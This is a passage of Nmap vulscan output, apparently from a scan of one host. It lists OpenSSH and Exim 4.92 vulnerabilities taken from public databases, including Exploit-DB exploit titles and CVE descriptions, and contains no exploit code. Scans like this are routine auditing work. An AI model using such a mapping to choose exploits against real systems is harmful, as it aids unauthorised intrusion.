10557| [20418] OpenSSH-Portable Existing Password Remote Information Disclosure Weakness
10558| [20245] OpenSSH-Portable GSSAPI Authentication Abort Information Disclosure Weakness
10559| [20241] Portable OpenSSH GSSAPI Remote Code Execution Vulnerability
10560| [20216] OpenSSH Duplicated Block Remote Denial of Service Vulnerability
10561| [16892] OpenSSH Remote PAM Denial Of Service Vulnerability
10562| [14963] OpenSSH LoginGraceTime Remote Denial Of Service Vulnerability
10563| [14729] OpenSSH GSSAPI Credential Disclosure Vulnerability
10564| [14727] OpenSSH DynamicForward Inadvertent GatewayPorts Activation Vulnerability
10565| [11781] OpenSSH-portable PAM Authentication Remote Information Disclosure Vulnerability
10566| [9986] RCP, OpenSSH SCP Client File Corruption Vulnerability
10567| [9040] OpenSSH PAM Conversation Memory Scrubbing Weakness
10568| [8677] Multiple Portable OpenSSH PAM Vulnerabilities
10569| [8628] OpenSSH Buffer Mismanagement Vulnerabilities
10570| [7831] OpenSSH Reverse DNS Lookup Access Control Bypass Vulnerability
10571| [7482] OpenSSH Remote Root Authentication Timing Side-Channel Weakness
10572| [7467] OpenSSH-portable Enabled PAM Delay Information Disclosure Vulnerability
10573| [7343] OpenSSH Authentication Execution Path Timing Information Leakage Weakness
10574| [6168] OpenSSH Visible Password Vulnerability
10575| [5374] OpenSSH Trojan Horse Vulnerability
10576| [5093] OpenSSH Challenge-Response Buffer Overflow Vulnerabilities
10577| [4560] OpenSSH Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
10578| [4241] OpenSSH Channel Code Off-By-One Vulnerability
10579| [3614] OpenSSH UseLogin Environment Variable Passing Vulnerability
10580| [3560] OpenSSH Kerberos Arbitrary Privilege Elevation Vulnerability
10581| [3369] OpenSSH Key Based Source IP Access Control Bypass Vulnerability
10582| [3345] OpenSSH SFTP Command Restriction Bypassing Vulnerability
10583| [2917] OpenSSH PAM Session Evasion Vulnerability
10584| [2825] OpenSSH Client X11 Forwarding Cookie Removal File Symbolic Link Vulnerability
10585| [2356] OpenSSH Private Key Authentication Check Vulnerability
10586| [1949] OpenSSH Client Unauthorized Remote Forwarding Vulnerability
10587| [1334] OpenSSH UseLogin Vulnerability
10588|
10589| IBM X-Force - https://exchange.xforce.ibmcloud.com:
10590| [83258] GSI-OpenSSH auth-pam.c security bypass
10591| [82781] OpenSSH time limit denial of service
10592| [82231] OpenSSH pam_ssh_agent_auth PAM code execution
10593| [74809] OpenSSH ssh_gssapi_parse_ename denial of service
10594| [72756] Debian openssh-server commands information disclosure
10595| [68339] OpenSSH pam_thread buffer overflow
10596| [67264] OpenSSH ssh-keysign unauthorized access
10597| [65910] OpenSSH remote_glob function denial of service
10598| [65163] OpenSSH certificate information disclosure
10599| [64387] OpenSSH J-PAKE security bypass
10600| [63337] Cisco Unified Videoconferencing OpenSSH weak security
10601| [46620] OpenSSH and multiple SSH Tectia products CBC mode information disclosure
10602| [45202] OpenSSH signal handler denial of service
10603| [44747] RHEL OpenSSH backdoor
10604| [44280] OpenSSH PermitRootLogin information disclosure
10605| [44279] OpenSSH sshd weak security
10606| [44037] OpenSSH sshd SELinux role unauthorized access
10607| [43940] OpenSSH X11 forwarding information disclosure
10608| [41549] OpenSSH ForceCommand directive security bypass
10609| [41438] OpenSSH sshd session hijacking
10610| [40897] OpenSSH known_hosts weak security
10611| [40587] OpenSSH username weak security
10612| [37371] OpenSSH username data manipulation
10613| [37118] RHSA update for OpenSSH privilege separation monitor authentication verification weakness not installed
10614| [37112] RHSA update for OpenSSH signal handler race condition not installed
10615| [37107] RHSA update for OpenSSH identical block denial of service not installed
10616| [36637] OpenSSH X11 cookie privilege escalation
10617| [35167] OpenSSH packet.c newkeys[mode] denial of service
10618| [34490] OpenSSH OPIE information disclosure
10619| [33794] OpenSSH ChallengeResponseAuthentication information disclosure
10620| [32975] Apple Mac OS X OpenSSH denial of service
10621| [32387] RHSA-2006:0738 updates for openssh not installed
10622| [32359] RHSA-2006:0697 updates for openssh not installed
10623| [32230] RHSA-2006:0298 updates for openssh not installed
10624| [32132] RHSA-2006:0044 updates for openssh not installed
10625| [30120] OpenSSH privilege separation monitor authentication verification weakness
10626| [29255] OpenSSH GSSAPI user enumeration
10627| [29254] OpenSSH signal handler race condition
10628| [29158] OpenSSH identical block denial of service
10629| [28147] Apple Mac OS X OpenSSH nonexistent user login denial of service
10630| [25116] OpenSSH OpenPAM denial of service
10631| [24305] OpenSSH SCP shell expansion command execution
10632| [22665] RHSA-2005:106 updates for openssh not installed
10633| [22117] OpenSSH GSSAPI allows elevated privileges
10634| [22115] OpenSSH GatewayPorts security bypass
10635| [20930] OpenSSH sshd.c LoginGraceTime denial of service
10636| [19441] Sun Solaris OpenSSH LDAP (1) client authentication denial of service
10637| [17213] OpenSSH allows port bouncing attacks
10638| [16323] OpenSSH scp file overwrite
10639| [13797] OpenSSH PAM information leak
10640| [13271] OpenSSH could allow an attacker to corrupt the PAM conversion stack
10641| [13264] OpenSSH PAM code could allow an attacker to gain access
10642| [13215] OpenSSH buffer management errors could allow an attacker to execute code
10643| [13214] OpenSSH memory vulnerabilities
10644| [13191] OpenSSH large packet buffer overflow
10645| [12196] OpenSSH could allow an attacker to bypass login restrictions
10646| [11970] OpenSSH could allow an attacker to obtain valid administrative account
10647| [11902] OpenSSH PAM support enabled information leak
10648| [9803] OpenSSH "
10649| [9763] OpenSSH downloaded from the OpenBSD FTP site or OpenBSD FTP mirror sites could contain a Trojan Horse
10650| [9307] OpenSSH is running on the system
10651| [9169] OpenSSH "
10652| [8896] OpenSSH Kerberos 4 TGT/AFS buffer overflow
10653| [8697] FreeBSD libutil in OpenSSH fails to drop privileges prior to using the login class capability database
10654| [8383] OpenSSH off-by-one error in channel code
10655| [7647] OpenSSH UseLogin option arbitrary code execution
10656| [7634] OpenSSH using sftp and restricted keypairs could allow an attacker to bypass restrictions
10657| [7598] OpenSSH with Kerberos allows attacker to gain elevated privileges
10658| [7179] OpenSSH source IP access control bypass
10659| [6757] OpenSSH "
10660| [6676] OpenSSH X11 forwarding symlink attack could allow deletion of arbitrary files
10661| [6084] OpenSSH 2.3.1 allows remote users to bypass authentication
10662| [5517] OpenSSH allows unauthorized access to resources
10663| [4646] OpenSSH UseLogin option allows remote users to execute commands as root
10664|
10665| Exploit-DB - https://www.exploit-db.com:
10666| [21579] OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (2)
10667| [21578] OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (1)
10668| [21402] OpenSSH 2.x/3.x Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
10669| [21314] OpenSSH 2.x/3.0.1/3.0.2 Channel Code Off-By-One Vulnerability
10670| [20253] OpenSSH 1.2 scp File Create/Overwrite Vulnerability
10671| [17462] FreeBSD OpenSSH 3.5p1 - Remote Root Exploit
10672| [14866] Novell Netware 6.5 - OpenSSH Remote Stack Overflow
10673| [6094] Debian OpenSSH Remote SELinux Privilege Elevation Exploit (auth)
10674| [3303] Portable OpenSSH <= 3.6.1p-PAM / 4.1-SUSE Timing Attack Exploit
10675| [2444] OpenSSH <= 4.3 p1 (Duplicated Block) Remote Denial of Service Exploit
10676| [1572] Dropbear / OpenSSH Server (MAX_UNAUTH_CLIENTS) Denial of Service
10677| [258] glibc-2.2 and openssh-2.3.0p1 exploits glibc => 2.1.9x
10678| [26] OpenSSH/PAM <= 3.6.1p1 Remote Users Ident (gossh.sh)
10679| [25] OpenSSH/PAM <= 3.6.1p1 Remote Users Discovery Tool
10680|
10681| OpenVAS (Nessus) - http://www.openvas.org:
10682| [902488] OpenSSH 'sshd' GSSAPI Credential Disclosure Vulnerability
10683| [900179] OpenSSH CBC Mode Information Disclosure Vulnerability
10684| [881183] CentOS Update for openssh CESA-2012:0884 centos6
10685| [880802] CentOS Update for openssh CESA-2009:1287 centos5 i386
10686| [880746] CentOS Update for openssh CESA-2009:1470 centos5 i386
10687| [870763] RedHat Update for openssh RHSA-2012:0884-04
10688| [870129] RedHat Update for openssh RHSA-2008:0855-01
10689| [861813] Fedora Update for openssh FEDORA-2010-5429
10690| [861319] Fedora Update for openssh FEDORA-2007-395
10691| [861170] Fedora Update for openssh FEDORA-2007-394
10692| [861012] Fedora Update for openssh FEDORA-2007-715
10693| [840345] Ubuntu Update for openssh vulnerability USN-597-1
10694| [840300] Ubuntu Update for openssh update USN-612-5
10695| [840271] Ubuntu Update for openssh vulnerability USN-612-2
10696| [840268] Ubuntu Update for openssh update USN-612-7
10697| [840259] Ubuntu Update for openssh vulnerabilities USN-649-1
10698| [840214] Ubuntu Update for openssh vulnerability USN-566-1
10699| [831074] Mandriva Update for openssh MDVA-2010:162 (openssh)
10700| [830929] Mandriva Update for openssh MDVA-2010:090 (openssh)
10701| [830807] Mandriva Update for openssh MDVA-2010:026 (openssh)
10702| [830603] Mandriva Update for openssh MDVSA-2008:098 (openssh)
10703| [830523] Mandriva Update for openssh MDVSA-2008:078 (openssh)
10704| [830317] Mandriva Update for openssh-askpass-qt MDKA-2007:127 (openssh-askpass-qt)
10705| [830191] Mandriva Update for openssh MDKSA-2007:236 (openssh)
10706| [802407] OpenSSH 'sshd' Challenge Response Authentication Buffer Overflow Vulnerability
10707| [103503] openssh-server Forced Command Handling Information Disclosure Vulnerability
10708| [103247] OpenSSH Ciphersuite Specification Information Disclosure Weakness
10709| [103064] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
10710| [100584] OpenSSH X Connections Session Hijacking Vulnerability
10711| [100153] OpenSSH CBC Mode Information Disclosure Vulnerability
10712| [66170] CentOS Security Advisory CESA-2009:1470 (openssh)
10713| [65987] SLES10: Security update for OpenSSH
10714| [65819] SLES10: Security update for OpenSSH
10715| [65514] SLES9: Security update for OpenSSH
10716| [65513] SLES9: Security update for OpenSSH
10717| [65334] SLES9: Security update for OpenSSH
10718| [65248] SLES9: Security update for OpenSSH
10719| [65218] SLES9: Security update for OpenSSH
10720| [65169] SLES9: Security update for openssh,openssh-askpass
10721| [65126] SLES9: Security update for OpenSSH
10722| [65019] SLES9: Security update for OpenSSH
10723| [65015] SLES9: Security update for OpenSSH
10724| [64931] CentOS Security Advisory CESA-2009:1287 (openssh)
10725| [61639] Debian Security Advisory DSA 1638-1 (openssh)
10726| [61030] Debian Security Advisory DSA 1576-2 (openssh)
10727| [61029] Debian Security Advisory DSA 1576-1 (openssh)
10728| [60840] FreeBSD Security Advisory (FreeBSD-SA-08:05.openssh.asc)
10729| [60803] Gentoo Security Advisory GLSA 200804-03 (openssh)
10730| [60667] Slackware Advisory SSA:2008-095-01 openssh
10731| [59014] Slackware Advisory SSA:2007-255-01 openssh
10732| [58741] Gentoo Security Advisory GLSA 200711-02 (openssh)
10733| [57919] Gentoo Security Advisory GLSA 200611-06 (openssh)
10734| [57895] Gentoo Security Advisory GLSA 200609-17 (openssh)
10735| [57585] Debian Security Advisory DSA 1212-1 (openssh (1:3.8.1p1-8.sarge.6))
10736| [57492] Slackware Advisory SSA:2006-272-02 openssh
10737| [57483] Debian Security Advisory DSA 1189-1 (openssh-krb5)
10738| [57476] FreeBSD Security Advisory (FreeBSD-SA-06:22.openssh.asc)
10739| [57470] FreeBSD Ports: openssh
10740| [56352] FreeBSD Security Advisory (FreeBSD-SA-06:09.openssh.asc)
10741| [56330] Gentoo Security Advisory GLSA 200602-11 (OpenSSH)
10742| [56294] Slackware Advisory SSA:2006-045-06 openssh
10743| [53964] Slackware Advisory SSA:2003-266-01 New OpenSSH packages
10744| [53885] Slackware Advisory SSA:2003-259-01 OpenSSH Security Advisory
10745| [53884] Slackware Advisory SSA:2003-260-01 OpenSSH updated again
10746| [53788] Debian Security Advisory DSA 025-1 (openssh)
10747| [52638] FreeBSD Security Advisory (FreeBSD-SA-03:15.openssh.asc)
10748| [52635] FreeBSD Security Advisory (FreeBSD-SA-03:12.openssh.asc)
10749| [11343] OpenSSH Client Unauthorized Remote Forwarding
10750| [10954] OpenSSH AFS/Kerberos ticket/token passing
10751| [10883] OpenSSH Channel Code Off by 1
10752| [10823] OpenSSH UseLogin Environment Variables
10753|
10754| SecurityTracker - https://www.securitytracker.com:
10755| [1028187] OpenSSH pam_ssh_agent_auth Module on Red Hat Enterprise Linux Lets Remote Users Execute Arbitrary Code
10756| [1026593] OpenSSH Lets Remote Authenticated Users Obtain Potentially Sensitive Information
10757| [1025739] OpenSSH on FreeBSD Has Buffer Overflow in pam_thread() That Lets Remote Users Execute Arbitrary Code
10758| [1025482] OpenSSH ssh-keysign Utility Lets Local Users Gain Elevated Privileges
10759| [1025028] OpenSSH Legacy Certificates May Disclose Stack Contents to Remote Users
10760| [1022967] OpenSSH on Red Hat Enterprise Linux Lets Remote Authenticated Users Gain Elevated Privileges
10761| [1021235] OpenSSH CBC Mode Error Handling May Let Certain Remote Users Obtain Plain Text in Certain Cases
10762| [1020891] OpenSSH on Debian Lets Remote Users Prevent Logins
10763| [1020730] OpenSSH for Red Hat Enterprise Linux Packages May Have Been Compromised
10764| [1020537] OpenSSH on HP-UX Lets Local Users Hijack X11 Sessions
10765| [1019733] OpenSSH Unsafe Default Configuration May Let Local Users Execute Arbitrary Commands
10766| [1019707] OpenSSH Lets Local Users Hijack Forwarded X Sessions in Certain Cases
10767| [1017756] Apple OpenSSH Key Generation Process Lets Remote Users Deny Service
10768| [1017183] OpenSSH Privilege Separation Monitor Validation Error May Cause the Monitor to Fail to Properly Control the Unprivileged Process
10769| [1016940] OpenSSH Race Condition in Signal Handler Lets Remote Users Deny Service and May Potentially Permit Code Execution
10770| [1016939] OpenSSH GSSAPI Authentication Abort Error Lets Remote Users Determine Valid Usernames
10771| [1016931] OpenSSH SSH v1 CRC Attack Detection Implementation Lets Remote Users Deny Service
10772| [1016672] OpenSSH on Mac OS X Lets Remote Users Deny Service
10773| [1015706] OpenSSH Interaction With OpenPAM Lets Remote Users Deny Service
10774| [1015540] OpenSSH scp Double Shell Character Expansion During Local-to-Local Copying May Let Local Users Gain Elevated Privileges in Certain Cases
10775| [1014845] OpenSSH May Unexpectedly Activate GatewayPorts and Also May Disclose GSSAPI Credentials in Certain Cases
10776| [1011193] OpenSSH scp Directory Traversal Flaw Lets Remote SSH Servers Overwrite Files in Certain Cases
10777| [1011143] OpenSSH Default Configuration May Be Unsafe When Used With Anonymous SSH Services
10778| [1007791] Portable OpenSSH PAM free() Bug May Let Remote Users Execute Root Code
10779| [1007716] OpenSSH buffer_append_space() and Other Buffer Management Errors May Let Remote Users Execute Arbitrary Code
10780| [1006926] OpenSSH Host Access Restrictions Can Be Bypassed By Remote Users
10781| [1006688] OpenSSH Timing Flaw With Pluggable Authentication Modules Can Disclose Valid User Account Names to Remote Users
10782| [1004818] OpenSSH's Secure Shell (SSH) Implementation Weakness May Disclose User Passwords to Remote Users During Man-in-the-Middle Attacks
10783| [1004616] OpenSSH Integer Overflow and Buffer Overflow May Allow Remote Users to Gain Root Access to the System
10784| [1004391] OpenSSH 'BSD_AUTH' Access Control Bug May Allow Unauthorized Remote Users to Authenticated to the System
10785| [1004115] OpenSSH Buffer Overflow in Kerberos Ticket and AFS Token Processing Lets Local Users Execute Arbitrary Code With Root Level Permissions
10786| [1003758] OpenSSH Off-by-one 'Channels' Bug May Let Authorized Remote Users Execute Arbitrary Code with Root Privileges
10787| [1002895] OpenSSH UseLogin Environment Variable Bug Lets Local Users Execute Commands and Gain Root Access
10788| [1002748] OpenSSH 3.0 Denial of Service Condition May Allow Remote Users to Crash the sshd Daemon and KerberosV Configuration Error May Allow Remote Users to Partially Authenticate When Authentication Should Not Be Permitted
10789| [1002734] OpenSSH's S/Key Implementation Information Disclosure Flaw Provides Remote Users With Information About Valid User Accounts
10790| [1002455] OpenSSH May Fail to Properly Restrict IP Addresses in Certain Configurations
10791| [1002432] OpenSSH's Sftp-server Subsystem Lets Authorized Remote Users with Restricted Keypairs Obtain Additional Access on the Server
10792| [1001683] OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies
10793|
10794| OSVDB - http://www.osvdb.org:
10795| [92034] GSI-OpenSSH auth-pam.c Memory Management Authentication Bypass
10796| [90474] Red Hat / Fedora PAM Module for OpenSSH Incorrect error() Function Calling Local Privilege Escalation
10797| [90007] OpenSSH logingracetime / maxstartup Threshold Connection Saturation Remote DoS
10798| [81500] OpenSSH gss-serv.c ssh_gssapi_parse_ename Function Field Length Value Parsing Remote DoS
10799| [78706] OpenSSH auth-options.c sshd auth_parse_options Function authorized_keys Command Option Debug Message Information Disclosure
10800| [75753] OpenSSH PAM Module Aborted Conversation Local Information Disclosure
10801| [75249] OpenSSH sftp-glob.c remote_glob Function Glob Expression Parsing Remote DoS
10802| [75248] OpenSSH sftp.c process_put Function Glob Expression Parsing Remote DoS
10803| [72183] Portable OpenSSH ssh-keysign ssh-rand-helper Utility File Descriptor Leak Local Information Disclosure
10804| [70873] OpenSSH Legacy Certificates Stack Memory Disclosure
10805| [69658] OpenSSH J-PAKE Public Parameter Validation Shared Secret Authentication Bypass
10806| [67743] Novell NetWare OpenSSH SSHD.NLM Absolute Path Handling Remote Overflow
10807| [59353] OpenSSH sshd Local TCP Redirection Connection Masking Weakness
10808| [58495] OpenSSH sshd ChrootDirectory Feature SetUID Hard Link Local Privilege Escalation
10809| [56921] OpenSSH Unspecified Remote Compromise
10810| [53021] OpenSSH on ftp.openbsd.org Trojaned Distribution
10811| [50036] OpenSSH CBC Mode Chosen Ciphertext 32-bit Chunk Plaintext Context Disclosure
10812| [49386] OpenSSH sshd TCP Connection State Remote Account Enumeration
10813| [48791] OpenSSH on Debian sshd Crafted Username Arbitrary Remote SELinux Role Access
10814| [47635] OpenSSH Packages on Red Hat Enterprise Linux Compromised Distribution
10815| [47227] OpenSSH X11UseLocalhost X11 Forwarding Port Hijacking
10816| [45873] Cisco WebNS SSHield w/ OpenSSH Crafted Large Packet Remote DoS
10817| [43911] OpenSSH ~/.ssh/rc ForceCommand Bypass Arbitrary Command Execution
10818| [43745] OpenSSH X11 Forwarding Local Session Hijacking
10819| [43371] OpenSSH Trusted X11 Cookie Connection Policy Bypass
10820| [39214] OpenSSH linux_audit_record_event Crafted Username Audit Log Injection
10821| [37315] pam_usb OpenSSH Authentication Unspecified Issue
10822| [34850] OpenSSH on Mac OS X Key Generation Remote Connection DoS
10823| [34601] OPIE w/ OpenSSH Account Enumeration
10824| [34600] OpenSSH S/KEY Authentication Account Enumeration
10825| [32721] OpenSSH Username Password Complexity Account Enumeration
10826| [30232] OpenSSH Privilege Separation Monitor Weakness
10827| [29494] OpenSSH packet.c Invalid Protocol Sequence Remote DoS
10828| [29266] OpenSSH GSSAPI Authentication Abort Username Enumeration
10829| [29264] OpenSSH Signal Handler Pre-authentication Race Condition Code Execution
10830| [29152] OpenSSH Identical Block Packet DoS
10831| [27745] Apple Mac OS X OpenSSH Nonexistent Account Login Enumeration DoS
10832| [23797] OpenSSH with OpenPAM Connection Saturation Forked Process Saturation DoS
10833| [22692] OpenSSH scp Command Line Filename Processing Command Injection
10834| [20216] OpenSSH with KerberosV Remote Authentication Bypass
10835| [19142] OpenSSH Multiple X11 Channel Forwarding Leaks
10836| [19141] OpenSSH GSSAPIAuthentication Credential Escalation
10837| [18236] OpenSSH no pty Command Execution Local PAM Restriction Bypass
10838| [16567] OpenSSH Privilege Separation LoginGraceTime DoS
10839| [16039] Solaris 108994 Series Patch OpenSSH LDAP Client Authentication DoS
10840| [9562] OpenSSH Default Configuration Anon SSH Service Port Bounce Weakness
10841| [9550] OpenSSH scp Traversal Arbitrary File Overwrite
10842| [6601] OpenSSH *realloc() Unspecified Memory Errors
10843| [6245] OpenSSH SKEY/BSD_AUTH Challenge-Response Remote Overflow
10844| [6073] OpenSSH on FreeBSD libutil Arbitrary File Read
10845| [6072] OpenSSH PAM Conversation Function Stack Modification
10846| [6071] OpenSSH SSHv1 PAM Challenge-Response Authentication Privilege Escalation
10847| [5536] OpenSSH sftp-server Restricted Keypair Restriction Bypass
10848| [5408] OpenSSH echo simulation Information Disclosure
10849| [5113] OpenSSH NIS YP Netgroups Authentication Bypass
10850| [4536] OpenSSH Portable AIX linker Privilege Escalation
10851| [3938] OpenSSL and OpenSSH /dev/random Check Failure
10852| [3456] OpenSSH buffer_append_space() Heap Corruption
10853| [2557] OpenSSH Multiple Buffer Management Multiple Overflows
10854| [2140] OpenSSH w/ PAM Username Validity Timing Attack
10855| [2112] OpenSSH Reverse DNS Lookup Bypass
10856| [2109] OpenSSH sshd Root Login Timing Side-Channel Weakness
10857| [1853] OpenSSH Symbolic Link 'cookies' File Removal
10858| [839] OpenSSH PAMAuthenticationViaKbdInt Challenge-Response Remote Overflow
10859| [781] OpenSSH Kerberos TGT/AFS Token Passing Remote Overflow
10860| [730] OpenSSH Channel Code Off by One Remote Privilege Escalation
10861| [688] OpenSSH UseLogin Environment Variable Local Command Execution
10862| [642] OpenSSH Multiple Key Type ACL Bypass
10863| [504] OpenSSH SSHv2 Public Key Authentication Bypass
10864| [341] OpenSSH UseLogin Local Privilege Escalation
10865|_
1086625/tcp open smtp Exim smtpd 4.92
10867| vulscan: VulDB - https://vuldb.com:
10868| [141327] Exim up to 4.92.1 Backslash privilege escalation
10869| [138827] Exim up to 4.92 Expansion Code Execution
10870| [135932] Exim up to 4.92 privilege escalation
10871| [113048] Exim up to 4.90 SMTP Listener Message memory corruption
10872|
10873| MITRE CVE - https://cve.mitre.org:
10874| [CVE-2012-5671] Heap-based buffer overflow in the dkim_exim_query_dns_txt function in dkim.c in Exim 4.70 through 4.80, when DKIM support is enabled and acl_smtp_connect and acl_smtp_rcpt are not set to "warn control = dkim_disable_verify," allows remote attackers to execute arbitrary code via an email from a malicious DNS server.
10875| [CVE-2012-0478] The texImage2D implementation in the WebGL subsystem in Mozilla Firefox 4.x through 11.0, Firefox ESR 10.x before 10.0.4, Thunderbird 5.0 through 11.0, Thunderbird ESR 10.x before 10.0.4, and SeaMonkey before 2.9 does not properly restrict JSVAL_TO_OBJECT casts, which might allow remote attackers to execute arbitrary code via a crafted web page.
10876| [CVE-2011-1764] Format string vulnerability in the dkim_exim_verify_finish function in src/dkim.c in Exim before 4.76 might allow remote attackers to execute arbitrary code or cause a denial of service (daemon crash) via format string specifiers in data used in DKIM logging, as demonstrated by an identity field containing a % (percent) character.
10877| [CVE-2011-1407] The DKIM implementation in Exim 4.7x before 4.76 permits matching for DKIM identities to apply to lookup items, instead of only strings, which allows remote attackers to execute arbitrary code or access a filesystem via a crafted identity.
10878| [CVE-2011-0017] The open_log function in log.c in Exim 4.72 and earlier does not check the return value from (1) setuid or (2) setgid system calls, which allows local users to append log data to arbitrary files via a symlink attack.
10879| [CVE-2010-4345] Exim 4.72 and earlier allows local users to gain privileges by leveraging the ability of the exim user account to specify an alternate configuration file with a directive that contains arbitrary commands, as demonstrated by the spool_directory directive.
10880| [CVE-2010-4344] Heap-based buffer overflow in the string_vformat function in string.c in Exim before 4.70 allows remote attackers to execute arbitrary code via an SMTP session that includes two MAIL commands in conjunction with a large message containing crafted headers, leading to improper rejection logging.
10881| [CVE-2010-2024] transports/appendfile.c in Exim before 4.72, when MBX locking is enabled, allows local users to change permissions of arbitrary files or create arbitrary files, and cause a denial of service or possibly gain privileges, via a symlink attack on a lockfile in /tmp/.
10882| [CVE-2010-2023] transports/appendfile.c in Exim before 4.72, when a world-writable sticky-bit mail directory is used, does not verify the st_nlink field of mailbox files, which allows local users to cause a denial of service or possibly gain privileges by creating a hard link to another user's file.
10883| [CVE-2006-1251] Argument injection vulnerability in greylistclean.cron in sa-exim 4.2 allows remote attackers to delete arbitrary files via an email with a To field that contains a filename separated by whitespace, which is not quoted when greylistclean.cron provides the argument to the rm command.
10884| [CVE-2005-0022] Buffer overflow in the spa_base64_to_bits function in Exim before 4.43, as originally obtained from Samba code, and as called by the auth_spa_client function, may allow attackers to execute arbitrary code during SPA authentication.
10885| [CVE-2005-0021] Multiple buffer overflows in Exim before 4.43 may allow attackers to execute arbitrary code via (1) an IPv6 address with more than 8 components, as demonstrated using the -be command line option, which triggers an overflow in the host_aton function, or (2) the -bh command line option or dnsdb PTR lookup, which triggers an overflow in the dns_build_reverse function.
10886| [CVE-2004-0400] Stack-based buffer overflow in Exim 4 before 4.33, when the headers_check_syntax option is enabled, allows remote attackers to cause a denial of service and possibly execute arbitrary code during the header check.
10887| [CVE-2004-0399] Stack-based buffer overflow in Exim 3.35, and other versions before 4, when the sender_verify option is true, allows remote attackers to cause a denial of service and possibly execute arbitrary code during sender verification.
10888| [CVE-2003-0743] Heap-based buffer overflow in smtp_in.c for Exim 3 (exim3) before 3.36 and Exim 4 (exim4) before 4.21 may allow remote attackers to execute arbitrary code via an invalid (1) HELO or (2) EHLO argument with a large number of spaces followed by a NULL character and a newline, which is not properly trimmed before the "(no argument given)" string is appended to the buffer.
10889| [CVE-2002-1381] Format string vulnerability in daemon.c for Exim 4.x through 4.10, and 3.x through 3.36, allows exim administrative users to execute arbitrary code by modifying the pid_file_path value.
10890|
10891| SecurityFocus - https://www.securityfocus.com/bid/:
10892| [103049] Exim 'base64d()' Function Buffer Overflow Vulnerability
10893| [99252] Exim CVE-2017-1000369 Local Privilege Escalation Vulnerability
10894| [94947] Exim CVE-2016-9963 Unspecified Information Disclosure Vulnerability
10895| [84132] Exim CVE-2016-1531 Local Privilege Escalation Vulnerability
10896| [68857] Exim CVE-2014-2972 Local Privilege Escalation Vulnerability
10897| [67695] Exim 'dmarc.c' Remote Code Execution Vulnerability
10898| [60465] Exim for Dovecot 'use_shell' Remote Command Execution Vulnerability
10899| [56285] Exim DKIM DNS Decoding CVE-2012-5671 Remote Buffer Overflow Vulnerability
10900| [47836] Exim DKIM CVE-2011-1407 Remote Code Execution Vulnerability
10901| [47736] Exim 'dkim_exim_verify_finish()' Remote Format String Vulnerability
10902| [46065] Exim 'log.c' Local Privilege Escalation Vulnerability
10903| [45341] Exim ALT_CONFIG_ROOT_ONLY 'exim' User Local Privilege Escalation Vulnerability
10904| [45308] Exim Crafted Header Remote Code Execution Vulnerability
10905| [40454] Exim MBX Locking Insecure Temporary File Creation Vulnerability
10906| [40451] Exim Sticky Mail Directory Local Privilege Escalation Vulnerability
10907| [36181] ikiwiki 'teximg' Plugin Insecure TeX Commands Information Disclosure Vulnerability
10908| [23977] Exim SpamAssassin Reply Remote Buffer Overflow Vulnerability
10909| [17110] sa-exim Unauthorized File Access Vulnerability
10910| [12268] Exim IP Address Command Line Argument Local Buffer Overflow Vulnerability
10911| [12188] Exim SPA Authentication Remote Buffer Overflow Vulnerability
10912| [12185] Exim Illegal IPv6 Address Buffer Overflow Vulnerability
10913| [10291] Exim Header Syntax Checking Remote Stack Buffer Overrun Vulnerability
10914| [10290] Exim Sender Verification Remote Stack Buffer Overrun Vulnerability
10915| [8518] Exim EHLO/HELO Remote Heap Corruption Vulnerability
10916| [6314] Exim Internet Mailer Format String Vulnerability
10917| [4096] Exim Configuration File Argument Command Line Buffer Overflow Vulnerability
10918| [3728] Exim Pipe Hostname Arbitrary Command Execution Vulnerability
10919| [2828] Exim Format String Vulnerability
10920| [1859] Exim Buffer Overflow Vulnerability
10921|
10922| IBM X-Force - https://exchange.xforce.ibmcloud.com:
10923| [84758] Exim sender_address parameter command execution
10924| [84015] Exim command execution
10925| [80186] Mozilla Firefox, Thunderbird, and SeaMonkey copyTexImage2D code execution
10926| [80184] Mozilla Firefox, Thunderbird, and SeaMonkey texImage2D calls code execution
10927| [79615] Exim dkim_exim_query_dns_txt() buffer overflow
10928| [75155] Mozilla Firefox, Thunderbird, and SeaMonkey texImage2D denial of service
10929| [67455] Exim DKIM processing code execution
10930| [67299] Exim dkim_exim_verify_finish() format string
10931| [65028] Exim open_log privilege escalation
10932| [63967] Exim config file privilege escalation
10933| [63960] Exim header buffer overflow
10934| [59043] Exim mail directory privilege escalation
10935| [59042] Exim MBX symlink
10936| [52922] ikiwiki teximg plugin information disclosure
10937| [34265] Exim spamd buffer overflow
10938| [25286] Sa-exim greylistclean.cron file deletion
10939| [22687] RHSA-2005:025 updates for exim not installed
10940| [18901] Exim dns_build_reverse buffer overflow
10941| [18764] Exim spa_base64_to_bits function buffer overflow
10942| [18763] Exim host_aton buffer overflow
10943| [16079] Exim require_verify buffer overflow
10944| [16077] Exim header_check_syntax buffer overflow
10945| [16075] Exim sender_verify buffer overflow
10946| [13067] Exim HELO or EHLO command heap overflow
10947| [10761] Exim daemon.c format string
10948| [8194] Exim configuration file -c command-line argument buffer overflow
10949| [7738] Exim allows attacker to hide commands in localhost names using pipes
10950| [6671] Exim "
10951| [1893] Exim MTA allows local users to gain root privileges
10952|
10953| Exploit-DB - https://www.exploit-db.com:
10954| [16925] Exim4 <= 4.69 - string_format Function Heap Buffer Overflow
10955| [15725] Exim 4.63 Remote Root Exploit
10956| [1009] Exim <= 4.41 dns_build_reverse Local Exploit
10957| [812] Exim <= 4.43 auth_spa_server() Remote PoC Exploit
10958| [796] Exim <= 4.42 Local Root Exploit
10959| [756] Exim <= 4.41 dns_build_reverse Local Exploit PoC
10960|
10961| OpenVAS (Nessus) - http://www.openvas.org:
10962| [100663] Exim < 4.72 RC2 Multiple Vulnerabilities
10963|
10964| SecurityTracker - https://www.securitytracker.com:
10965| [1025539] Exim DKIM Processing Flaw Lets Remote Users Execute Arbitrary Code
10966| [1025504] Exim DKIM Signature Format String Flaw Lets Remote Users Execute Arbitrary Code
10967| [1024859] Exim Configuration File Capability Lets Local Users Gain Elevated Privileges
10968| [1024858] Exim Buffer Overfow in string_format() Lets Remote Users Execute Arbitrary Code
10969| [1012904] Exim Buffer Overflow in dns_build_reverse() Lets Local Users Obtain Elevated Privileges
10970| [1012771] Exim Buffer Overflows in host_aton() and spa_base64_to_bits() May Let Local Users Gain Elevated Privileges
